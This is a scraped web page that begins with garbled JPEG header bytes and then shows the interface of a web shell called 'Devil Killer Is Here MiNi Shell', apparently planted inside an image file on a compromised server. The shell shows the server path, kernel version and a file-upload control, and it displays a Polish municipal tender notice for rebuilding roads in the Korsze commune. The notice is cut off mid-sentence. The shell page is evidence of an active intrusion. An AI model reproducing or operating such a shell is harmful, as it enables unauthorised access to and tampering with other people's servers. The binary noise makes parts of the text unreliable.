JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220915/0034974301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dróg gminnych na terenie gminy Korsze” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KORSZE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743605</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Adama Mickiewicza 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Korsze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-430</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(89) 754 18 28</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(89) 754 00 11</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugim_korsze@korsze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.korsze.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dróg gminnych na terenie gminy Korsze” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eb3bc45d-34de-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00349743</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00003961/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 „Przebudowa dróg gminnych na terenie gminy Korsze”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.korsze.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://korsze.logintrade.net/rejestracja/oplatformie.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://korsze.logintrade.net/rejestracja/oplatformie.html</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.bip.korsze.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. (RODO) informujemy, że:<br/>1. Administratorem Państwa danych osobowych jest Burmistrz Korsz, ul. Adama Mickiewicza 13, 11-430 Korsze.<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować za pośrednictwem maila:<br/>iod@korsze.pl lub pisemnie na adres Administratora,<br/>3. Pani/Pana dane osobowe będą przetwarzane w celu przeprowadzenia postępowania administracyjnego lub czynności urzędowej<br/>zgodnie ze złożonym wnioskiem. Podstawą prawną jest: Ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz.. U.<br/>z 2021 r. poz. 1129),<br/>4. Pani/Pana dane mogą zostać udostępnione podmiotom uprawnionym na podstawie przepisów prawa oraz z którymi administrator<br/>zawarł umowy powierzenia przetwarzania danych, w szczególności dostawcom oprogramowania komputerowego.<br/>5. Na podstawie przepisów prawa dane osobowe podlegają ujawnieniu następującym odbiorcom:<br/>6. Organy oraz jednostki uzgadniające,<br/>7. Organy wyższego stopnia.<br/>8. Dane po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane do celów archiwalnych i przechowywane przez<br/>okres niezbędny do zrealizowania przepisów dotyczących archiwizowania danych obowiązujących u Administratora.<br/>9. W zakresie swoich danych osobowych ma Pani/Pan prawo żądania: dostępu do danych, sprostowania danych. Przysługuje<br/>również Pani/Panu prawo do wniesienia sprzeciwu wobec przetwarzania, żądania usunięcia danych, żądania ograniczenia<br/>przetwarzania oraz przeniesienia danych, którego realizacja jednak ze względu na podstawę przetwarzania może być ograniczona<br/>lub wyłączona w konkretnym przypadku.<br/>10. Każda osoba ma prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych jeśli uzna, że przetwarzanie jej<br/>danych osobowych odbywa się niezgodnie z przepisami.<br/>11. Podanie danych osobowych jest obowiązkowe. Jest Pani/Pan zobowiązana/y do ich podania. Niepodanie danych osobowych<br/>będzie skutkowało wezwaniem do ich uzupełnienia, a w przypadku nieuzupełnienia pozostawienie wniosku bez rozpatrzenia.<br/>12. Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania oraz nie zostaną<br/>przekazane do państwa/organizacji międzynarodowej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GT.271.15.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja zadania pn.: „Przebudowa dróg gminnych na terenie gminy Korsze”,<br/>1) Przebudowa drogi gminnej Nr 123037N w miejscowości Garbno o długości 323 mb, w formule zaprojektuj i wybuduj – Zadanie nr 1,<br/>2) Przebudowa drogi gminnej Nr 123514N o długości 640 mb w miejscowości Korsze ulicy M.C. Skłodowskiej, w formule zaprojektuj i wybuduj – Zadanie nr 2,<br/>3) Przebudowa drogi wewnętrznej gminnej w miejscowości Prosna o długości 260 mb, w formule wybuduj – Zadanie nr 3.<br/>2. Przedmiotem zamówienia jest zaprojektowanie i wykonanie przebudowy dróg gminnych wraz z kanalizacją deszczową, rozbudową oświetlenia ulicznego oraz niezbędną przebudową infrastruktury teletechnicznej, elektroenergetycznej.<br/>3.Przedmiot zamówienia przewidziany jest do realizacji w systemie „zaprojektuj i wybuduj” składa się z dwóch części: opracowanie dokumentacji projektowej: branża drogowa, branża teletechniczna (przebudowa sieci- jeżeli zajdzie taka potrzeba), branża elektroenergetyczna (sieć oświetleniowa oraz usunięcie kolizji – jeżeli zajdzie taka potrzeba); wykonanie prac na podstawie pozwolenia na budowę lub zgłoszenia przebudowy dróg, przebudowy kolizji z infrastrukturą teletechniczną, przebudowy kolizji z infrastrukturą elektroenergetyczną (jeżeli zajdzie taka potrzeba).<br/>1) Zadanie nr 1– droga gminna Nr 123037N w miejscowości Garbno o długości 323 mb; gm. Korsze działki nr 32/1, 27/84, 27/38, 27/37, 27/83, 27/42, 27/80, 27/35, 27/41, obręb 0009 Garbno: <br/>a) Dokumentacja projektowa przebudowy drogi gminnej w miejscowości Garbno powinna zawierać <br/>w szczególności: <br/>− warunki techniczne wraz z uzgodnieniami przebudowy i budowy: kanalizacji deszczowej, kanału<br/>technologicznego;<br/>− warunki techniczne wraz z uzgodnieniami przebudowy kolizji, o ile wystąpią, istniejących sieci <br/>i przyłączy, w tym m.in.: elektroenergetycznych, telekomunikacyjnych, sieci wodociągowych,<br/>kanalizacji sanitarnej;<br/>− protokół z narady koordynacyjnej. Projekt przebudowy drogi gminnej nr 123037N przed oddaniem na naradę koordynacyjną należy uzgodnić pod względem merytorycznym i technicznym <br/>z Zamawiającym, <br/>− stosowne zgody wodnoprawne – o ile będą wymagane, <br/>b) Podstawowe parametry do zaprojektowania przebudowy drogi gminnej: <br/>- ulica jednojezdniowa o szerokości 5,50 m,<br/>- kategoria ruchu KR1,<br/>- chodniki o szerokości 1,50m,<br/>- 2 zatoki postojowe: miejsca postojowe dla samochodów osobowych usytuowanych prostopadle <br/>do krawędzi jezdni, miejsca postojowe dla samochodów osobowych usytuowane równolegle do<br/>krawędzi jezdni;<br/>- Kanalizacja deszczowa: rurociąg PVCØ315, przyłącza kanalizacji PVCØ200, studnie kanalizacji<br/>deszczowej Ø1000, studnie wpustowe kanalizacji deszczowej 400 x 600mm. <br/>c) Pozostałe zagospodarowanie do granicy pasa drogowego za pomocą terenów zielonych.<br/>2) Zadanie nr 2– droga gminna Nr 123514N o długości 640 mb w miejscowości Korsze ulicy M.C.<br/>Skłodowskiej, działki nr 389, 493, 291, 375 obręb 0002 Korsze : <br/>a) Dokumentacja projektowa przebudowy ulicy M. C. Skłodowskiej w miejscowości Korsze powinna<br/>zawierać w szczególności:<br/>− warunki techniczne wraz z uzgodnieniami przebudowy i budowy: kanalizacji deszczowej, kanału<br/>technologicznego, sieci wodociągowej;<br/>− warunki techniczne wraz z uzgodnieniami przebudowy kolizji, o ile wystąpią, istniejących sieci i<br/>przyłączy, w tym m.in.: elektroenergetycznych, telekomunikacyjnych, kanalizacji sanitarnej; <br/>− protokół z narady koordynacyjnej. Projekt przebudowy przed oddaniem na naradę koordynacyjną<br/>należy uzgodnić pod względem merytorycznym i technicznym z Zamawiającym;<br/>− stosowne zgody wodnoprawne – o ile będą wymagane. <br/>b) Podstawowe parametry do zaprojektowania przebudowy drogi gminnej:<br/>- ulica jednojezdniowa o szerokości 5,50 m – na wysokości działek: 374, 392/1, 392/2, 392/3, 392/4, 392/5, 392/6 Zamawiający proponuje wykonać pieszo jezdnię o łącznej szerokości 5,5 m z podziałem jezdni 4m oraz chodnikiem o szerokości 1,5 m; <br/>- chodniki o szerokości 1,50m;<br/>- kategoria ruchu KR1,<br/>- wodociąg: PE 160mm SDR 17 PN 10, PE 90mm SDR 17 PN 10;<br/>- kanalizacja deszczowa: rurociąg PVCØ400, przyłącza kanalizacji PVCØ200, studnie kanalizacji<br/>deszczowej Ø1000, studnie wpustowe kanalizacji deszczowej 400 x 600mm;<br/>− pozostałe zagospodarowanie do granicy pasa drogowego za pomocą terenów zielonych <br/>3) Zadanie nr 3 – przebudowa drogi wewnętrznej gminnej w miejscowości Prosna o długości 260 mb, nr. ewid działek nr 17/1,18/41,18/19,5/1 obręb nr Prosna: droga będzie przebudowywana na odcinku ok. 260m i będzie przebiegała po śladzie istniejącej drogi gminnej o nawierzchni utwardzonej. Droga ma szerokość 4,5 m , zaprojektowano ją jako dwukierunkową o nawierzchni z kostki brukowej.<br/>a) Zakres Robót podstawowych obejmuje:<br/>- prace przygotowawcze (Odtworzenie trasy i punktów wysokościowych, <br/>- roboty ziemne,<br/>- wykonanie konstrukcji nawierzchni,<br/>- odwodnienia,<br/>- wykonanie wjazdów, wraz z krawężnikami ,ławami,<br/>- regulację wysokościową do rzędnej projektowanej wszelkich nakryw studni, włazów, pokryw studni <br/>teletechnicznych, zasuw gazowych, wodociągowych oraz innych elementów uzbrojenia terenu,<br/>- wykonanie przekopów kontrolnych,<br/>- ułożenie rur ochronnych,<br/>- geodezyjny pomiar powykonawczy;<br/>b) podstawowe parametry techniczne:<br/>- projektowana długość ulicy: 260,00 m;<br/>- powierzchnia ulicy1378,38 m2;<br/>- powierzchnia zjazdów 103,119 m2;<br/>- ulica klasy „D”- dojazdowa z prędkością Vp = 50 km/h;<br/>- szerokość pasa ruchu 2.25 m;<br/>- szerokość jezdni 4.50 m;<br/>- szerokość pasa drogowego w liniach rozgraniczających : istniejąca<br/>- obciążenie ruchem o nacisku na oś 100 kN/oś<br/> - kategoria ruchu KR1.<br/>4. Szczegółowy opis przedmiotu zamówienia zawarty jest w Programie Funkcjonalno – Użytkowym (zadanie 1 i 2) oraz dokumentacji projektowej (zadanie nr 3) , specyfikacji warunków zamówienia wraz z ewentualnymi zmianami dokonanymi na etapie prowadzonego postępowania o udzielenie zamówienia publicznego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232300-5 - Roboty budowlane i pomocnicze w zakresie linii telefonicznych i ciągów komunikacyjnych</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) Cena (C) – waga kryterium 60 %<br/>2) Okres rękojmi i gwarancji za wady (G) – waga kryterium 40%<br/>2. Zasady oceny ofert:<br/>1) Kryterium Cena (C) – waga 60 % = 60 pkt.<br/>cena brutto najniższej oferty<br/>C = ------------------------------------------------ x 60 % x 100 pkt<br/>cena brutto badanej oferty<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) Kryterium okres rękojmi i gwarancji za wady (G) – 40% = 40 pkt.<br/>Kryterium ,,okres rękojmi i gwarancji za wady’’ zostanie ocenione na podstawie informacji zawartej w formularzu oferty na temat oferowanego przez Wykonawcę okresu rękojmi i gwarancji za wady. Maksymalna liczba punktów jaką może uzyskać oferta w tym kryterium wynosi 40,00 punktów. Kryterium rozpatrywane będzie według następujących zasad: Zamawiający wyznacza najkrótszy<br/>okres gwarancji i rękojmi za wady na przedmiot zamówienia na 36 miesięcy, licząc od daty podpisania protokołu odbioru końcowego. Określony przez Wykonawcę okres może być dłuższy od najkrótszego okresu co najwyżej o 24 miesiące tj.:<br/>a) w przypadku zadeklarowania przez Wykonawcę okresu gwarancji i rękojmi za wady wynoszącego<br/>36 miesięcy– Zamawiający przyzna: 0,00 punktów;<br/>b) w przypadku zadeklarowania przez Wykonawcę okresu gwarancji i rękojmi za wady wynoszącego 48 miesięcy – Zamawiający przyzna: 20,00 punktów;<br/>c) w przypadku zadeklarowania przez Wykonawcę okresu gwarancji i rękojmi za wady wynoszącego<br/>60 miesięcy – Zamawiający przyzna: 40,00 punktów;<br/>d) w przypadku jeżeli Wykonawca zaoferuje inny niż wskazany powyżej okres gwarancji i rękojmi za wady, wówczas w celu przyznania punktacji w tym kryterium okres gwarancji i rękojmi za wady zostanie zaokrąglony w dół do najbliższego okresu, natomiast zadeklarowany okres gwarancji i rękojmi za wady zostanie wpisany do umowy w sprawie zamówienia publicznego jako obowiązujący,<br/>e) w przypadku jeżeli Wykonawca nie wskaże żadnego okresu gwarancji i rękojmi za wady, jako obowiązujący zostanie przyjęty przez Zamawiającego minimalny okres gwarancji i rękojmi za wady 36 miesięcy, licząc od daty podpisania protokołu odbioru końcowego, zgodnie z postanowieniami zawartymi w SWZ;<br/>f) jeżeli Wykonawca zadeklaruje okres gwarancji i rękojmi za wady krótszy niż 36 miesięcy, wówczas oferta może zostać odrzucona zgodnie z dyspozycją art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodna z warunkami zamówienia.<br/>g) wymagane jest podanie w formularzu ofertowym okresu gwarancji i rękojmi za wady w miesiącach.<br/>3. Ocena punktowa oferty:<br/>Każda oferta niepodlegająca odrzuceniu zostanie oceniona wg wyżej wymienionych zasad. Ocenę oferty stanowi suma punktów określona dla poszczególnych kryteriów wg wzoru:<br/>Of = C + G<br/>gdzie:<br/>Of – ilość punktów uzyskana przez badaną ofertę;<br/>C – ilość punków uzyskana przez badana ofertę w kryterium ,,Cena brutto oferty’’;<br/>G – ilość punków uzyskana przez badana ofertę w kryterium ,,Okres rękojmi i gwarancji za wady’’;<br/>4. Maksymalna łączna ilość punktów, jaką może otrzymać oferta Wykonawcy wynosi 100 pkt.<br/>5. Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>7. Za najkorzystniejszą zostanie uznana ofert, która nie podlega odrzuceniu i uzyskała najwyższą liczbę punktów.<br/>8. Cena ofertowa musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) posiada doświadczenie we wskazanym poniżej zakresie:<br/>• Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 3 roboty budowlane polegające na budowie lub przebudowie dróg publicznych o wartości co najmniej j 500.000,00 zł brutto każde świadczenie, oraz<br/>• Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 